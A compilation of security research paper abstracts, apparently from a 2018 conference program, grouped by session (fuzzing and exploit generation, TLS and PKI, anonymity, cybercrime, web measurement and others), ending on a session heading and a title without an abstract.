In this paper, we present Charm, a system solution that facilitates dynamic analysis of device drivers of mobile systems. Charm’s key technique is remote device driver execution, which enables the device driver to execute in a virtual machine on a workstation. Charm makes this possible by using the actual mobile system only for servicing the low-level and infrequent I/O operations through a low-latency and customized USB channel. Charm does not require any specialized hardware and is immediately available to analysts. We show that it is feasible to apply Charm to various device drivers, including camera, audio, GPU, and IMU sensor drivers, in different mobile systems, including LG Nexus 5X, Huawei Nexus 6P, and Samsung Galaxy S7. In an extensive evaluation, we show that Charm enhances the usability of fuzzing of device drivers, enables record-and-replay of driver’s execution, and facilitates detailed vulnerability analysis. Altogether, these capabilities have enabled us to find 25 bugs in device drivers, analyze 3 existing ones, and even build an arbitrary-code-execution kernel exploit using one of them.

Inception: System-Wide Security Testing of Real-World Embedded Systems Software

Connected embedded systems are becoming widely deployed, and their security is a serious concern. Current techniques for security testing of embedded software rely either on source code or on binaries. Detecting vulnerabilities by testing binary code is harder, because source code semantics are lost. Unfortunately, in embedded systems, high-level source code (C/C++) is often mixed with hand-written assembly, which cannot be directly handled by current source-based tools.

In this paper we introduce Inception, a framework to perform security testing of complete real-world embedded firmware. Inception introduces novel techniques for symbolic execution in embedded systems. In particular, Inception Translator generates and merges LLVM bitcode from high-level source code, hand-written assembly, binary libraries, and part of the processor hardware behavior. This design reduces differences with real execution as well as the manual effort. The source code semantics are preserved, improving the effectiveness of security checks. Inception Symbolic Virtual Machine, based on KLEE, performs symbolic execution, using several strategies to handle different levels of memory abstractions, interaction with peripherals, and interrupts. Finally, the Inception Debugger is a high-performance JTAG debugger which performs redirection of memory accesses to the real hardware.

We first validate our implementation using 53000 tests comparing Inception’s execution to concrete execution on an Arm Cortex-M3 chip. We then show Inception’s advantages on a benchmark made of 1624 synthetic vulnerable programs, four real-world open source and industrial applications, and 19 demos. We discovered eight crashes and two previously unknown vulnerabilities, demonstrating the effectiveness of Inception as a tool to assist embedded device firmware testing.

Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices

The rapidly increasing landscape of Internet-of-Thing (IoT) devices has introduced significant technical challenges for their management and security, as these IoT devices in the wild are from different device types, vendors, and product models. The discovery of IoT devices is the pre-requisite to characterize, monitor, and protect these devices. However, manual device annotation impedes a large-scale discovery, and the device classification based on machine learning requires large training data with labels. Therefore, automatic device discovery and annotation in large-scale remains an open problem in IoT. In this paper, we propose an Acquisitional Rule-based Engine (ARE), which can automatically generate rules for discovering and annotating IoT devices without any training data. ARE builds device rules by leveraging application-layer response data from IoT devices and product descriptions in relevant websites for device annotations. We define a transaction as a mapping between a unique response to a product description. To collect the transaction set, ARE extracts relevant terms in the response data as the search queries for crawling websites. ARE uses the association algorithm to generate rules of IoT device annotations in the form of (type, vendor, and product). We conduct experiments and three applications to validate the effectiveness of ARE.

Web Applications

A Sense of Time for JavaScript and Node.js: First-Class Timeouts as a Cure for Event Handler Poisoning

The software development community is adopting the Event-Driven Architecture (EDA) to provide scalable web services, most prominently through Node.js. Though the EDA scales well, it comes with an inherent risk: the Event Handler Poisoning (EHP) Denial of Service attack. When an EDA-based server multiplexes many clients onto few threads, a blocked thread (EHP) renders the server unresponsive. EHP attacks are a serious threat, with hundreds of vulnerabilities already reported in the wild.

We make three contributions against EHP attacks. First, we describe EHP attacks, and show that they are a common form of vulnerability in the largest EDA community, the Node.js ecosystem. Second, we design a defense against EHP attacks, First-Class Timeouts, which incorporates timeouts at the EDA framework level. Our Node.cure prototype defends Node.js applications against all known EHP attacks with overheads between 0% and 24% on real applications. Third, we promote EHP awareness in the Node.js community. We analyzed Node.js for vulnerable APIs and documented or corrected them, and our guide on avoiding EHP attacks is available on nodejs.org.

Freezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers

Regular expression denial of service (ReDoS) is a class of algorithmic complexity attacks where matching a regular expression against an attacker-provided input takes unexpectedly long. The single-threaded execution model of JavaScript makes JavaScript-based web servers particularly susceptible to ReDoS attacks. Despite this risk and the increasing popularity of the server-side Node.js platform, there is currently little reported knowledge about the severity of the ReDoS problem in practice. This paper presents a large-scale study of ReDoS vulnerabilities in real-world web sites. Underlying our study is a novel methodology for analyzing the exploitability of deployed servers. The basic idea is to search for previously unknown vulnerabilities in popular libraries, hypothesize how these libraries may be used by servers, and to then craft targeted exploits. In the course of the study, we identify 25 previously unknown vulnerabilities in popular modules and test 2,846 of the most popular websites against them. We find that 339 of these web sites suffer from at least one ReDoS vulnerability. Since a single request can block a vulnerable site for several seconds, and sometimes even much longer, ReDoS poses a serious threat to the availability of these sites. Our results are a call-to-arms for developing techniques to detect and mitigate ReDoS vulnerabilities in JavaScript.

(官方没给,来自论文摘要)Modern multi-tier web applications are composed of several dynamic features, which make their vulnerability analysis challenging from a purely static analysis perspective. We describe an approach that overcomes the challenges posed by the dynamic nature of web applications. Our approach combines dynamic analysis that is guided by static analysis techniques in order to automatically identify vulnerabilities and build working exploits. Our approach is implemented and evaluated in NAVEX, a tool that can scale the process of automatic vulnerability analysis and exploit generation to large applications and to multiple classes of vulnerabilities. In our experiments, we were able to use NAVEX over a codebase of 3.2 million lines of PHP code, and construct 204 exploits in the code that was analyzed.

Rampart: Protecting Web Applications from CPU-Exhaustion Denial-of-Service Attacks

Denial-of-Service (DoS) attacks pose a severe threat to the availability of web applications. Traditionally, attackers have employed botnets or amplification techniques to send a significant amount of requests to exhaust a target web server’s resources, and, consequently, prevent it from responding to legitimate requests. However, more recently, highly sophisticated DoS attacks have emerged, in which a single, carefully crafted request results in significant resource consumption and ties up a web application’s back-end components for a non-negligible amount of time. Unfortunately, these attacks require only few requests to overwhelm an application, which makes them difficult to detect by state-of-the-art detection systems.

In this paper, we present Rampart, which is a defense that protects web applications from sophisticated CPU-exhaustion DoS attacks. Rampart detects and stops sophisticated CPU-exhaustion DoS attacks using statistical methods and function-level program profiling. Furthermore, it synthesizes and deploys filters to block subsequent attacks, and it adaptively updates them to minimize any potentially negative impact on legitimate users.

We implemented Rampart as an extension to the PHP Zend engine. Rampart has negligible performance overhead and it can be deployed for any PHP application without having to modify the application’s source code. To evaluate Rampart’s effectiveness and efficiency, we demonstrate that it protects two of the most popular web applications, WordPress and Drupal, from real-world and synthetic CPU-exhaustion DoS attacks, and we also show that Rampart preserves web server performance with low false positive rate and low false negative rate.

Anonymity

How Do Tor Users Interact With Onion Services?

Onion services are anonymous network services that are exposed over the Tor network. In contrast to conventional Internet services, onion services are private, generally not indexed by search engines, and use self-certifying domain names that are long and difficult for humans to read. In this paper, we study how people perceive, understand, and use onion services based on data from 17 semi-structured interviews and an online survey of 517 users. We find that users have an incomplete mental model of onion services, use these services for anonymity, and have vary- ing trust in onion services in general. Users also have difficulty discovering and tracking onion sites and authenticating them. Finally, users want technical improvements to onion services and better information on how to use them. Our findings suggest various improvements for the security and usability of Tor onion services, including ways to automatically detect phishing of onion services, clearer security indicators, and better ways to manage onion domain names that are difficult to remember.

Towards Predicting Efficient and Anonymous Tor Circuits

The Tor anonymity system provides online privacy for millions of users, but it is slower than typical web browsing. To improve Tor performance, we propose PredicTor, a path selection technique that uses a Random Forest classifier trained on recent measurements of Tor to predict the performance of a proposed path. If the path is predicted to be fast, then the client builds a circuit using those relays. We implemented PredicTor in the Tor source code and show through live Tor experiments and Shadow simulations that PredicTor improves Tor network performance by 11% to 23% compared to Vanilla Tor and by 7% to 13% compared to the previous state-of-the-art scheme. Our experiments show that PredicTor is the first path selection algorithm to dynamically avoid highly congested nodes during times of high congestion and avoid long-distance paths during times of low congestion. We evaluate the anonymity of PredicTor using standard entropy-based and time-to-first-compromise metrics, but these cannot capture the possibility of leakage due to the use of location in path selection. To better address this, we propose a new anonymity metric called CLASI: Client Autonomous System Inference. CLASI is the first anonymity metric in Tor that measures an adversary’s ability to infer client Autonomous Systems (ASes) by fingerprinting circuits at the network, country, and relay level. We find that CLASI shows anonymity loss for location-aware path selection algorithms, where entropy-based metrics show little to no loss of anonymity. Additionally, CLASI indicates that PredicTor has similar sender AS leakage compared to the current Tor path selection algorithm due to PredicTor building circuits that are independent of client location.

BurnBox: Self-Revocable Encryption in a World Of Compelled Access

Dissidents, journalists, and others require technical means to protect their privacy in the face of compelled access to their digital devices (smartphones, laptops, tablets, etc.). For example, authorities increasingly force disclosure of all secrets, including passwords, to search devices upon national border crossings. We therefore present the design, implementation, and evaluation of a new system to help victims of compelled searches. Our system, called BurnBox, provides self-revocable encryption: the user can temporarily disable their access to specific files stored remotely, without revealing which files were revoked during compelled searches, even if the adversary also compromises the cloud storage service. They can later restore access. We formalize the threat model and provide a construction that uses an erasable index, secure erasure of keys, and standard cryptographic tools in order to provide security supported by our formal analysis. We report on a prototype implementation, which showcases the practicality of BurnBox.

An Empirical Analysis of Anonymity in Zcash

Among the now numerous alternative cryptocurrencies derived from Bitcoin, Zcash is often touted as the one with the strongest anonymity guarantees, due to its basis in well-regarded cryptographic research. In this paper, we examine the extent to which anonymity is achieved in the deployed version of Zcash. We investigate all facets of anonymity in Zcash’s transactions, ranging from its transparent transactions to the interactions with and within its main privacy feature, a shielded pool that acts as the anonymity set for users wishing to spend coins privately. We conclude that while it is possible to use Zcash in a private way, it is also possible to shrink its anonymity set considerably by developing simple heuristics based on identifiable patterns of usage.

Network Defenses

NetHide: Secure and Practical Network Topology Obfuscation

Simple path tracing tools such as traceroute allow malicious users to infer network topologies remotely and use that knowledge to craft advanced denial-of-service (DoS) attacks such as Link-Flooding Attacks (LFAs). Yet, despite the risk, most network operators still allow path tracing as it is an essential network debugging tool.

In this paper, we present NetHide, a network topology obfuscation framework that mitigates LFAs while preserving the practicality of path tracing tools. The key idea behind NetHide is to formulate network obfuscation as a multi-objective optimization problem that allows for a flexible tradeoff between security (encoded as hard constraints) and usability (encoded as soft constraints). While solving this problem exactly is hard, we show that NetHide can obfuscate topologies at scale by only considering a subset of the candidate solutions and without reducing obfuscation quality. In practice, NetHide obfuscates the topology by intercepting and modifying path tracing probes directly in the data plane. We show that this process can be done at line-rate, in a stateless fashion, by leveraging the latest generation of programmable network devices.

We fully implemented NetHide and evaluated it on realistic topologies. Our results show that NetHide is able to obfuscate large topologies (>150 nodes) while preserving near-perfect debugging capabilities. In particular, we show that operators can still precisely trace back >90 % of link failures despite obfuscation.

Towards a Secure Zero-rating Framework with Three Parties

Zero-rating services provide users with free access to contracted or affiliated Content Providers (CPs), but also incur new types of free-riding attacks. Specifically, a malicious user can masquerade a zero-rating CP or alter an existing zero-rating communication to evade charges enforced by the Internet Service Provider (ISP). According to our study, major commercial ISPs, such as T-Mobile, China Mobile, and airport WiFi, are all vulnerable to such free-riding attacks. In this paper, we propose a secure, backward compatible, zero-rating framework, called ZFree, which only allows network traffic authorized by the correct CP to be zero-rated. We perform a formal security analysis using ProVerif, and the results show that ZFree is secure, i.e., preserving both packet integrity and CP server authenticity. We have implemented an open-source prototype of ZFree available at this repository (https://github.com/zfree2018/ZFREE). A working demo is at this link (http://zfree.org/). Our evaluation shows that ZFree is lightweight, scalable and secure.

Fuzzing and Exploit Generation

MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation

OS fuzzers primarily test the system call interface between the OS kernel and user-level applications for security vulnerabilities. The effectiveness of evolutionary OS fuzzers depends heavily on the quality and diversity of their seed system call sequences. However, generating good seeds for OS fuzzing is a hard problem as the behavior of each system call depends heavily on the OS kernel state created by the previously executed system calls. Therefore, popular evolutionary OS fuzzers often rely on hand-coded rules for generating valid seed sequences of system calls that can bootstrap the fuzzing process. Unfortunately, this approach severely restricts the diversity of the seed system call sequences and therefore limits the effectiveness of the fuzzers.

In this paper, we develop MoonShine, a novel strategy for distilling seeds for OS fuzzers from system call traces of real-world programs while still maintaining the dependencies across the system calls. MoonShine leverages light-weight static analysis for efficiently detecting dependencies across different system calls.

We designed and implemented MoonShine as an extension to Syzkaller, a state-of-the-art evolutionary fuzzer for the Linux kernel. Starting from traces containing 2.8 million system calls gathered from 3,220 real-world programs, MoonShine distilled down to just over 14,000 calls while preserving 86% of the original code coverage. Using these distilled seed system call sequences, MoonShine was able to improve Syzkaller’s achieved code coverage for the Linux kernel by 13% on average. MoonShine also found 14 new vulnerabilities in the Linux kernel that were not found by Syzkaller.

QSYM : A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing

Recently, hybrid fuzzing has been proposed to address the limitations of fuzzing and concolic execution by combining both approaches. The hybrid approach has shown its effectiveness in various synthetic benchmarks such as DARPA Cyber Grand Challenge (CGC) binaries, but it still suffers from scaling to find bugs in complex, real-world software. We observed that the performance bottleneck of the existing concolic executor is the main limiting factor for its adoption beyond a small-scale study.

To overcome this problem, we design a fast concolic execution engine, called QSYM, to support hybrid fuzzing. The key idea is to tightly integrate the symbolic emulation with the native execution using dynamic binary translation, making it possible to implement more fine-grained, so faster, instruction-level symbolic emulation. Additionally, QSYM loosens the strict soundness requirements of conventional concolic executors for better performance, yet takes advantage of a faster fuzzer for validation, providing unprecedented opportunities for performance optimizations, e.g., optimistically solving constraints and pruning uninteresting basic blocks.

Our evaluation shows that QSYM does not just outperform state-of-the-art fuzzers (i.e., found 14× more bugs than VUzzer in the LAVA-M dataset, and outperformed Driller in 104 binaries out of 126), but also found 13 previously unknown security bugs in eight real-world programs like Dropbox Lepton, ffmpeg, and OpenJPEG, which have already been intensively tested by the state-of-the-art fuzzers, AFL and OSS-Fuzz.

Automatic Heap Layout Manipulation for Exploitation

Heap layout manipulation is integral to exploiting heap-based memory corruption vulnerabilities. In this paper we present the first automatic approach to the problem, based on pseudo-random black-box search. Our approach searches for the inputs required to place the source of a heap-based buffer overflow or underflow next to heap-allocated objects that an exploit developer, or automatic exploit generation system, wishes to read or corrupt. We present a framework for benchmarking heap layout manipulation algorithms, and use it to evaluate our approach on several real-world allocators, showing that pseudo-random black box search can be highly effective. We then present SHRIKE, a novel system that can perform automatic heap layout manipulation on the PHP interpreter and can be used in the construction of control-flow hijacking exploits. Starting from PHP’s regression tests, SHRIKE discovers fragments of PHP code that interact with the interpreter’s heap in useful ways, such as making allocations and deallocations of particular sizes, or allocating objects containing sensitive data, such as pointers. SHRIKE then uses our search algorithm to piece together these fragments into programs, searching for one that achieves a desired heap layout. SHRIKE allows an exploit developer to focus on the higher level concepts in an exploit, and to defer the resolution of heap layout constraints to SHRIKE. We demonstrate this by using SHRIKE in the construction of a control-flow hijacking exploit for the PHP interpreter.

FUZE: Towards Facilitating Exploit Generation for Kernel Use-After-Free Vulnerabilities

Software vendors usually prioritize their bug remediation based on ease of their exploitation. However, accurately determining exploitability typically takes tremendous hours and requires significant manual efforts. To address this issue, automated exploit generation techniques can be adopted. In practice, they however exhibit an insufficient ability to evaluate exploitability particularly for the kernel Use-After-Free (UAF) vulnerabilities. This is mainly because of the complexity of UAF exploitation as well as the scalability of an OS kernel.

In this paper, we therefore propose FUZE, a new framework to facilitate the process of kernel UAF exploitation. The design principle behind this technique is that we expect the ease of crafting an exploit could augment a security analyst with the ability to expedite exploitability evaluation. Technically, FUZE utilizes kernel fuzzing along with symbolic execution to identify, analyze and evaluate the system calls valuable and useful for kernel UAF exploitation.

To demonstrate the utility of FUZE, we implement FUZE on a 64-bit Linux system by extending a binary analysis framework and a kernel fuzzer. Using 15 real-world kernel UAF vulnerabilities on Linux systems, we then demonstrate FUZE could not only escalate kernel UAF exploitability and but also diversify working exploits. In addition, we show that FUZE could facilitate security mitigation bypassing, making exploitability evaluation less labor-intensive and more efficient.

TLS and PKI

The Secure Socket API: TLS as an Operating System Service

SSL/TLS libraries are notoriously hard for developers to use, leaving system administrators at the mercy of buggy and vulnerable applications. We explore the use of the standard POSIX socket API as a vehicle for a simplified TLS API, while also giving administrators the ability to control applications and tailor TLS configuration to their needs. We first assess OpenSSL and its uses in open source software, recommending how this functionality should be accommodated within the POSIX API. We then propose the Secure Socket API (SSA), a minimalist TLS API built using existing network functions and find that it can be employed by existing network applications by modifications requiring as little as one line of code. We next describe a prototype SSA implementation that leverages network system calls to provide privilege separation and support for other programming languages. We end with a discussion of the benefits and limitations of the SSA and our accompanying implementation, noting avenues for future work.

Return Of Bleichenbacher’s Oracle Threat (ROBOT)

In 1998 Bleichenbacher presented an adaptive chosen-ciphertext attack on the RSA PKCS~#1~v1.5 padding scheme. The attack exploits the availability of a server which responds with different messages based on the ciphertext validity. This server is used as an oracle and allows the attacker to decrypt RSA ciphertexts. Given the importance of this attack, countermeasures were defined in TLS and other cryptographic standards using RSA PKCS~#1~v1.5.

We perform the first large-scale evaluation of Bleichenbacher’s RSA vulnerability. We show that this vulnerability is still very prevalent in the Internet and affected almost a third of the top 100 domains in the Alexa Top 1 Million list, including Facebook and Paypal.

We identified vulnerable products from nine different vendors and open source projects, among them F5, Citrix, Radware, Palo Alto Networks, IBM, and Cisco. These implementations provide novel side-channels for constructing Bleichenbacher oracles: TCP resets, TCP timeouts, or duplicated alert messages. In order to prove the importance of this attack, we have demonstrated practical exploitation by signing a message with the private key of \texttt{facebook.com}’s HTTPS certificate. Finally, we discuss countermeasures against Bleichenbacher attacks in TLS and recommend to deprecate the RSA encryption key exchange in TLS and the RSA PKCS~#1~v1.5 standard.

Bamboozling Certificate Authorities with BGP

The Public Key Infrastructure (PKI) protects users from malicious man-in-the-middle attacks by having trusted Certificate Authorities (CAs) vouch for the domain names of servers on the Internet through digitally signed certificates. Ironically, the mechanism CAs use to issue certificates is itself vulnerable to man-in-the-middle attacks by network-level adversaries. Autonomous Systems (ASes) can exploit vulnerabilities in the Border Gateway Protocol (BGP) to hijack traffic destined to a victim’s domain. In this paper, we rigorously analyze attacks that an adversary can use to obtain a bogus certificate. We perform the first real-world demonstration of BGP attacks to obtain bogus certificates from top CAs in an ethical manner. To assess the vulnerability of the PKI, we collect a dataset of 1.8 million certificates and find that an adversary would be capable of gaining a bogus certificate for the vast majority of domains. Finally, we propose and evaluate two countermeasures to secure the PKI: 1) CAs verifying domains from multiple vantage points to make it harder to launch a successful attack, and 2) a BGP monitoring system for CAs to detect suspicious BGP routes and delay certificate issuance to give network operators time to react to BGP attacks.

The Broken Shield: Measuring Revocation Effectiveness in the Windows Code-Signing PKI

Recent measurement studies have highlighted security threats against the code-signing public key infrastructure (PKI), such as certificates that had been compromised or issued directly to the malware authors. The primary mechanism for mitigating these threats is to revoke the abusive certificates. However, the distributed yet closed nature of the code signing PKI makes it difficult to evaluate the effectiveness of revocations in this ecosystem. In consequence, the magnitude of signed malware threat is not fully understood.

In this paper, we collect seven datasets, including the largest corpus of code-signing certificates, and we combine them to analyze the revocation process from end to end. Effective revocations rely on three roles: (1) discovering the abusive certificates, (2) revoking the certificates effectively, and (3) disseminating the revocation information for clients. We assess the challenge for discovering compromised certificates and the subsequent revocation delays. We show that erroneously setting revocation dates causes signed malware to remain valid even after the certificate has been revoked. We also report failures in disseminating the revocations, leading clients to continue trusting the revoked certificates.

Vulnerability Mitigations

Debloating Software through Piece-Wise Compilation and Loading

Programs are bloated. Our study shows that only 5% of libc is used on average across the Ubuntu Desktop envi- ronment (2016 programs); the heaviest user, vlc media player, only needed 18%. In this paper: (1) We present a debloating framework built on a compiler toolchain that can successfully de- bloat programs (shared/static libraries and executables). Our solution can successfully compile and load most li- braries on Ubuntu Desktop 16.04. (2) We demonstrate the elimination of over 79% of code from coreutils and 86% of code from SPEC CPU 2006 benchmark pro- grams without affecting functionality. We show that even complex programs such as Firefox and curl can be debloated without a need to recompile. (3) We demon- strate the security impact of debloating by eliminating over 71% of reusable code gadgets from the coreutils suite, and show that unused code that contains real-world vulnerabilities can also be successfully eliminated with- out adverse effects on the program. (4) We incur a low load time overhead.

Precise and Accurate Patch Presence Test for Binaries

Patching is the main resort to battle software vulnerabilities. It is critical to ensure that patches are propagated to all affected software timely, which, unfortunately, is often not the case. Thus the capability to accurately test the security patch presence in software distributions is crucial, for both defenders and attackers.

Inspired by human analysts’ behaviors to inspect only small and localized code areas, we present FIBER, an automated system that leverages this observation in its core design. FIBER works by first parsing and analyzing the open-source security patches carefully and then generating fine-grained binary signatures that faithfully reflect the most representative syntax and semantic changes introduced by the patch, which are used to search against target binaries. Compared to previous work, FIBER leverages the source-level insight strategically by primarily focusing on small changes of patches and minimal contexts, instead of the whole function or file. We have systematically evaluated FIBER using 107 real-world security patches and 8 Android kernel images from 3 different mainstream vendors, the results show that FIBER can achieve an average accuracy of 94% with no false positives.

From Patching Delays to Infection Symptoms: Using Risk Profiles for an Early Discovery of Vulnerabilities Exploited in the Wild

At any given time there exist a large number of software vulnerabilities in our computing systems, but only a fraction of them are ultimately exploited in the wild. Advanced knowledge of which vulnerabilities are being or likely to be exploited would allow system administrators to prioritize patch deployments, enterprises to assess their security risk more precisely, and security companies to develop intrusion protection for those vulnerabilities. In this paper, we present a novel method based on the notion of community detection for early discovery of vulnerability exploits. Specifically, on one hand, we use symptomatic botnet data (in the form of a set of spam blacklists) to discover a community structure which reveals how similar Internet entities behave in terms of their malicious activities. On the other hand, we analyze the risk behavior of end-hosts through a set of patch deployment measurements that allow us to assess their risk to different vulnerabilities. The latter is then compared to the former to quantify whether the underlying risks are consistent with the observed global symptomatic community structure, which then allows us to statistically determine whether a given vulnerability is being actively exploited in the wild. Our results show that by observing up to 10 days’ worth of data, we can successfully detect vulnerability exploitation with a true positive rate of 90% and a false positive rate of 10%. Our detection is shown to be much earlier than the standard discovery time records for most vulnerabilities. Experiments also demonstrate that our community based detection algorithm is robust against strategic adversaries.

Understanding the Reproducibility of Crowd-reported Security Vulnerabilities

Today’s software systems are increasingly relying on the “power of the crowd” to identify new security vulnerabilities. And yet, it is not well understood how reproducible the crowd-reported vulnerabilities are. In this paper, we perform the first empirical analysis on a wide range of real-world security vulnerabilities (368 in total) with the goal of quantifying their reproducibility. Following a carefully controlled workflow, we organize a focused group of security analysts to carry out reproduction experiments. With 3600 man-hours spent, we obtain quantitative evidence on the prevalence of missing information in vulnerability reports and the low reproducibility of the vulnerabilities. We find that relying on a single vulnerability report from a popular security forum is generally difficult to succeed due to the incomplete information. By widely crowdsourcing the information gathering, security analysts could increase the reproduction success rate, but still face key challenges to troubleshoot the non-reproducible cases. To further explore solutions, we surveyed hackers, researchers, and engineers who have extensive domain expertise in software security (N=43). Going beyond Internet-scale crowdsourcing, we find that, security professionals heavily rely on manual debugging and speculative guessing to infer the missed information. Our result suggests that there is not only a necessity to overhaul the way a security forum collects vulnerability reports, but also a need for automated mechanisms to collect information commonly missing in a report.

Cybercrime

Plug and Prey? Measuring the Commoditization of Cybercrime via Online Anonymous Markets

Researchers have observed the increasing commoditization of cybercrime, that is, the offering of capabilities, services, and resources as commodities by specialized suppliers in the underground economy. Commoditization enables outsourcing, thus lowering entry barriers for aspiring criminals, and potentially driving further growth in cybercrime. While there is evidence in the literature of specific examples of cybercrime commoditization, the overall phenomenon is much less understood. Which parts of cybercrime value chains are successfully commoditized, and which are not? What kind of revenue do criminal business-to-business (B2B) services generate and how fast are they growing?

We use longitudinal data from eight online anonymous marketplaces over six years, from the original Silk Road to AlphaBay, and track the evolution of commoditization on these markets. We develop a conceptual model of the value chain components for dominant criminal business models. We then identify the market supply for these components over time. We find evidence of commoditization in most components, but the outsourcing options are highly restricted and transaction volume is often modest. Cash-out services feature the most listings and generate the largest revenue. Consistent with behavior observed in the context of narcotic sales, we also find a significant amount of revenue in retail cybercrime, i.e., business-to-consumer (B2C) rather than business-to-business. We conservatively estimate the overall revenue for cybercrime commodities on online anonymous markets to be at least US \$15M between 2011-2017. While there is growth, commoditization is a spottier phenomenon than previously assumed.

Reading Thieves’ Cant: Automatically Identifying and Understanding Dark Jargons from Cybercrime Marketplaces

Underground communication is invaluable for understanding cybercrimes. However, it is often obfuscated by the extensive use of dark jargons, innocently-looking terms like “popcorn” that serves sinister purposes (buying/selling drug, seeking crimeware, etc.). Discovery and understanding of these jargons have so far relied on manual effort, which is error-prone and cannot catch up with the fast evolving underground ecosystem. In this paper, we present the first technique, called Cantreader, to automatically detect and understand dark jargon. Our approach employs a neural-network based embedding technique to analyze the semantics of words, detecting those whose contexts in legitimate documents are significantly different from those in underground communication. For this purpose, we enhance the existing word embedding model to support semantic comparison across good and bad corpora, which leads to the detection of dark jargons. To further understand them, our approach utilizes projection learning to identify a jargon’s hypernym that sheds light on its true meaning when used in underground communication. Running Cantreader over one million traces collected from four underground forums, our approach automatically reported 3,462 dark jargons and their hypernyms, including 2,491 never known before. The study further reveals how these jargons are used (by 25% of the traces) and evolve and how they help cybercriminals communicate on legitimate forums.

Schrödinger’s RAT: Profiling the Stakeholders in the Remote Access Trojan Ecosystem

Remote Access Trojans (RATs) are a class of malware that give an attacker direct, interactive access to a victim’s personal computer, allowing the attacker to steal private data stored on the machine, spy on the victim in real-time using the camera and microphone, and interact directly with the victim via a dialog box. RATs have been used for surveillance, information theft, and extortion of victims.

In this work, we report on the attackers and victims for two popular RATs, njRAT and DarkComet. Using the malware repository VirusTotal, we find all instances of these RATs and identify the domain names of the controllers. We then register those domains that have expired and direct them to our measurement infrastructure, allowing us to determine the victims of these campaigns. We investigated several techniques for excluding network scanners and sandbox executions of the malware sample in order to exclude apparent infections that are not real victims of the campaign. Our results show that over 99% of the 828,137 IP addresses that connected to our sinkhole are likely not real victims. We report on the number of victims, how long RAT campaigns remain active, and the geographic relationship between victims and attackers.

The aftermath of a crypto-ransomware attack at a large academic institution

In 2016, a large North American university was subject to a significant crypto-ransomware attack and did not pay the ransom. We conducted a survey with 150 respondents and interviews with 30 affected students, staff, and faculty in the immediate aftermath to understand their experiences during the attack and the recovery process. We provide analysis of the technological, productivity, and personal and social impact of ransomware attacks, including previously unaccounted secondary costs. We suggest strategies for comprehensive cyber-response plans that include human factors, and highlight the importance of communication. We conclude with a Ransomware Process for Organizations diagram summarizing the additional contributing factors beyond those relevant to individual infections.

Web and Network Measurement

We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS

The default Same Origin Policy essentially restricts access of cross-origin network resources to be “write-only”. However, many web applications require “read’’ access to contents from a different origin, so developers have come up with workarounds, such as JSON-P, to bypass the default Same Origin Policy restriction. Such ad-hoc workarounds leave a number of inherent security issues. CORS (cross-origin resource sharing) is a more disciplined mechanism supported by all web browsers to handle cross-origin network accesses. This paper presents our empirical study about the real-world uses of CORS. We find that the design, implementation, and deployment of CORS are subject to a number of new security issues: 1) CORS relaxes the cross-origin “write’’ privilege in a number of subtle ways that are problematic in practice; 2) CORS brings new forms of risky trust dependencies into web interactions; 3) CORS is generally not well understood by developers, possibly due to its inexpressive policy and its complex and subtle interactions with other web mechanisms, leading to various misconfigurations. Finally, we propose protocol simplifications and clarifications to mitigate the security problems uncovered in our study. Some of our proposals have been adopted by both CORS specification and major browsers.

End-to-End Measurements of Email Spoofing Attacks

Spear phishing has been a persistent threat to users and organizations, and yet email providers still face key challenges to authenticate incoming emails. As a result, attackers can apply spoofing techniques to impersonate a trusted entity to conduct highly deceptive phishing attacks. In this work, we study email spoofing to answer three key questions: (1) How do email providers detect and handle forged emails? (2) Under what conditions can forged emails penetrate the defense to reach user inbox? (3) Once the forged email gets in, how email providers warn users? Is the warning truly effective?

We answer these questions by conducting an end-to-end measurement on 35 popular email providers and examining user reactions to spoofing through a real-world spoofing/phishing test. Our key findings are three folds. First, we observe that most email providers have the necessary protocols to detect spoofing, but still allow forged emails to reach the user inbox (e.g., Yahoo Mail, iCloud, Gmail). Second, once a forged email gets in, most email providers have no warning for users, particularly for mobile email apps. Some providers (e.g., Gmail Inbox) even have misleading UIs that make the forged email look authentic. Third, a few email providers (9/35) have implemented visual security cues on unverified emails. Our phishing experiment shows that security cues have a positive impact on reducing risky user actions, but cannot eliminate the risk. Our study reveals a major miscommunication between email providers and end-users. Improvements at both ends (server-side protocols and UIs) are needed to bridge the gap.

Who Is Answering My Queries: Understanding and Characterizing Interception of the DNS Resolution Path

DNS queries from end users are handled by recursive DNS servers for scalability. For convenience, Internet Service Providers (ISPs) assign recursive servers for their clients automatically when the clients choose the default network settings. But users should also have flexibility to use their preferred recursive servers, like public DNS servers. This kind of trust, however, can be broken by the hidden interception of the DNS resolution path (which we term as DNSIntercept). Specifically, on-path devices could spoof the IP addresses of user-specified DNS servers and intercept the DNS queries surreptitiously, introducing privacy and security issues.

In this paper, we perform a large-scale analysis of on-path DNS interception and shed light on its scope and characteristics. We design novel approaches to detect DNS interception and leverage 148,478 residential and cellular IP addresses around the world for analysis. As a result, we find that 259 of the 3,047 ASes (8.5%) that we inspect exhibit DNS interception behavior, including large providers, such as China Mobile. Moreover, we find that the DNS servers of the ASes which intercept requests may use outdated vulnerable software (deprecated before 2009) and lack security-related functionality, such as handling DNSSEC requests. Our work highlights the issues around on-path DNS interception and provides new insights for addressing such issues.

End-Users Get Maneuvered: Empirical Analysis of Redirection Hijacking in Content Delivery Networks

The success of Content Delivery Networks (CDNs) relies on the mapping system that leverages dynamically generated DNS records to distribute client’s request to a proximal server for achieving optimal content delivery. However, the mapping system is vulnerable to malicious hijacks, as (1) it is very difficult to provide pre-computed DNSSEC signatures for dynamically generated records and (2) even considering DNSSEC enabled, DNSSEC itself is vulnerable to replay attacks. By leveraging crafted but legitimate mapping between end-user and edge server, adversaries can hijack CDN’s request redirection and nullify the benefits offered by CDNs, such as proximal access, load balancing, and DoS protection, while remaining undetectable by existing security practices. In this paper, we investigate the security implications of dynamic mapping that remain understudied in security and CDN community. We perform a characterization of CDN’s service delivery and assess this fundamental vulnerability in DNS-based CDNs in the wild. We demonstrate that DNSSEC is ineffective to address this problem, even with the newly adopted ECDSA that is capable of achieving live signing. We then discuss practical countermeasures against such manipulation.

Attacks on Systems That Learn

With Great Training Comes Great Vulnerability: Practical Attacks against Transfer Learning

